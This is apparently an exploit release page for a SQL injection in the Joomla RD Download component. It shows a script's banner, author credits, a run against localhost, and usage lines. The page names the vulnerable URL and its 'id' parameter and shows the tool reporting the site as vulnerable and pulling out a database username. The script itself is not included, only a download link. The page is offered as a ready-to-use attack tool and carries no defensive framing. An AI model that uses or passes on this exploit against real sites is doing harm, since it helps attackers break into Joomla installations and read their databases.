claudio@backbox3:~$ python j00m_com_rd_download_sql_injection.py -t http://127.0.0.1

           _______                      __                                         
          |   _   .-----.-----.--------|  .---.-.                                  
          |___|   |  _  |  _  |        |  |  _  |                                  
          |.  |   |_____|_____|__|__|__|__|___._|                                  
          |:  1   |                                                                
          |::.. . |                                                                
          `-------'                                                                
           _______ ______       ______                        __                __ 
          |   _   |   _  \     |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |
          |.  l   |.  |   \    |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |
          |.  _   |.  |    \   |.  |    |_____|________|__|__|__|_____|___._|_____|
          |:  |   |:  1    /   |:  1    /                                          
          |::.|:. |::.. . /    |::.. . /                                           
          `--- ---`------'     `------'                                            
                                                    J00ml4 RD D0wnl04d Sql1nj3ct10n

                                      Written by:

                                    Claudio Viviani

                                 http://www.homelab.it

                                    [email protected]
                                [email protected]

                            https://www.facebook.com/homelabit
                              https://twitter.com/homelabit
                            https://plus.google.com/+HomelabIt1/
                   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[*] Trying to connect to: http://127.0.0.1/index.php?option=com_rd_download&view=download&task=dl&id=[SQLi]
[!] VULNERABLE
[*] Username: j00mUser@%
claudio@backbox3:~$

Info

# Exploit Name: Joomla RD Download SQL Injection
#
# Version: Unknown

Download

Download Exploit: HERE

Exploit Usage

 claudio@backbox3:~$ python j00m_com_rd_download_sql_injection.py -t http[s]://localhost[:PORT]
or
 claudio@backbox3:~$ python j00m_com_rd_download_sql_injection.py -t http[s]://localhost[:PORT]/basedir